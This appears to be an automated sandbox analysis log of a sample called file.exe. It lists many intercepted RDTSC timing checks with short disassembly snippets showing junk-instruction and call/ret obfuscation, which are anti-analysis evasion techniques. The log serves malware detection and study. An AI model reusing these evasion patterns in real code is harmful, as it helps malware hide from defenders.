                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1031932 second address: 10319BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FB47526A2E8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3929h] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FB47526A2E8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D3825h] 0x0000004b jmp 00007FB47526A2EDh 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D1D60h], ecx 0x00000058 movzx edi, bx 0x0000005b xchg eax, ebx 0x0000005c jmp 00007FB47526A2F5h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push ecx 0x00000067 pop ecx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10319BF second address: 10319C9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4752141B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10323C4 second address: 10323F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB47526A2E8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D387Dh] 0x00000015 push 00000000h 0x00000017 mov si, 58BAh 0x0000001b push 00000000h 0x0000001d stc 0x0000001e mov edi, 5A1CF643h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 jng 00007FB47526A2E6h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10323F4 second address: 10323FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB4752141B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103218A second address: 1032194 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB47526A2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10323FE second address: 1032402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032E0F second address: 1032E15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032E15 second address: 1032E1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB4752141B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032E1F second address: 1032E31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a je 00007FB47526A2ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033823 second address: 1033828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033828 second address: 103383D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB47526A2F1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103383D second address: 10338BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4752141B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FB4752141B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jo 00007FB4752141BCh 0x0000002d mov dword ptr [ebp+122D2EB5h], edx 0x00000033 xor esi, 0669E827h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007FB4752141B8h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 cld 0x00000056 jmp 00007FB4752141BFh 0x0000005b push 00000000h 0x0000005d mov edi, dword ptr [ebp+122D2175h] 0x00000063 xchg eax, ebx 0x00000064 jl 00007FB4752141D2h 0x0000006a push eax 0x0000006b push edx 0x0000006c push edi 0x0000006d pop edi 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10338BD second address: 10338E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47526A2F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10338E1 second address: 10338E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036E1D second address: 1036E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036E23 second address: 1036E2D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4752141BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036E2D second address: 1036E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 ja 00007FB47526A2E6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036E43 second address: 1036E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036E47 second address: 1036E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038455 second address: 1038475 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752141C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FB4752141B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10386ED second address: 10386F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1039697 second address: 103969B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10386F3 second address: 10386F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103969B second address: 103969F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A5F7 second address: 103A5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B512 second address: 103B520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB4752141B6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103969F second address: 10396A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B520 second address: 103B526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10396A5 second address: 10396AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10396AA second address: 10396BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FB4752141B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10396BB second address: 10396BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10396BF second address: 103975F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FB4752141B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 movzx edi, dx 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov edi, dword ptr [ebp+122D38F1h] 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov di, 5100h 0x0000003d mov edi, esi 0x0000003f mov eax, dword ptr [ebp+122D012Dh] 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007FB4752141B8h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D2723h], ebx 0x00000065 and bh, FFFFFF96h 0x00000068 push FFFFFFFFh 0x0000006a mov edi, dword ptr [ebp+12443F88h] 0x00000070 nop 0x00000071 jmp 00007FB4752141C4h 0x00000076 push eax 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a push edx 0x0000007b pop edx 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C52D second address: 103C531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C531 second address: 103C535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C535 second address: 103C555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FB47526A2E6h 0x0000000d ja 00007FB47526A2E6h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 jns 00007FB47526A2E6h 0x0000001f pop eax 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B69D second address: 103B719 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4752141B8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, esi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov ebx, dword ptr [ebp+122D3691h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FB4752141B8h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f jmp 00007FB4752141BEh 0x00000044 mov eax, dword ptr [ebp+122D03A5h] 0x0000004a sub bx, DC54h 0x0000004f push FFFFFFFFh 0x00000051 call 00007FB4752141BAh 0x00000056 mov di, ax 0x00000059 pop edi 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FB4752141BEh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B719 second address: 103B71F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C555 second address: 103C5E5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB4752141CDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FB4752141B8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 clc 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FB4752141B8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007FB4752141B8h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000017h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e mov ebx, dword ptr [ebp+122D3619h] 0x00000064 xchg eax, esi 0x00000065 push ebx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B71F second address: 103B723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C5E5 second address: 103C5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D4E9 second address: 103D4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D4EE second address: 103D504 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4752141BCh 0x00000008 jnl 00007FB4752141B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C7A0 second address: 103C7BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47526A2EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FB47526A2E6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103E615 second address: 103E628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB4752141B8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103E628 second address: 103E6BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47526A2EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FB47526A2E8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FB47526A2E8h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 00000017h 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D2803h], esi 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push ecx 0x0000004b call 00007FB47526A2E8h 0x00000050 pop ecx 0x00000051 mov dword ptr [esp+04h], ecx 0x00000055 add dword ptr [esp+04h], 00000018h 0x0000005d inc ecx 0x0000005e push ecx 0x0000005f ret 0x00000060 pop ecx 0x00000061 ret 0x00000062 mov dword ptr [ebp+122D25CCh], edx 0x00000068 xor dword ptr [ebp+122D2665h], eax 0x0000006e xchg eax, esi 0x0000006f push edi 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FB47526A2EEh 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F662 second address: 103F673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F673 second address: 103F677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F677 second address: 103F67D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10406CE second address: 10406D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10406D6 second address: 104073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a je 00007FB4752141BCh 0x00000010 and edx, 67488F9Ah 0x00000016 mov di, ax 0x00000019 popad 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FB4752141B8h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov bx, F3C4h 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D232Dh], ecx 0x00000042 xchg eax, esi 0x00000043 jng 00007FB4752141CBh 0x00000049 jmp 00007FB4752141C5h 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104073F second address: 1040743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104177E second address: 10417F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752141C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D18A8h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FB4752141B8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D3881h] 0x00000034 xchg eax, esi 0x00000035 js 00007FB4752141C6h 0x0000003b jmp 00007FB4752141C0h 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB4752141C2h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104289E second address: 10428A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103F873 second address: 103F88C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752141C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041A5C second address: 1041A71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007FB47526A2E6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042A40 second address: 1042A4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752141BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042A4E second address: 1042A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042A54 second address: 1042A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042A58 second address: 1042A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042A5C second address: 1042A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FB4752141BBh 0x0000000f jo 00007FB4752141BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104485E second address: 1044872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB47526A2EFh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042B34 second address: 1042B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042B3A second address: 1042B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043A35 second address: 1043A5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752141C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FB4752141BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043A5A second address: 1043A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB47526A2F1h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043A73 second address: 1043A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4752141C7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043B90 second address: 1043B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046AB3 second address: 1046ABD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4752141B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046ABD second address: 1046AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045C88 second address: 1045C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046AC3 second address: 1046B47 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB475272196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov bl, F4h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FB475272198h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b call 00007FB4752721A4h 0x00000030 mov dword ptr [ebp+122D2723h], ebx 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007FB475272198h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 or dword ptr [ebp+122D2756h], esi 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jns 00007FB47527219Ch 0x00000062 jne 00007FB475272196h 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1048B7E second address: 1048B95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB475210802h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
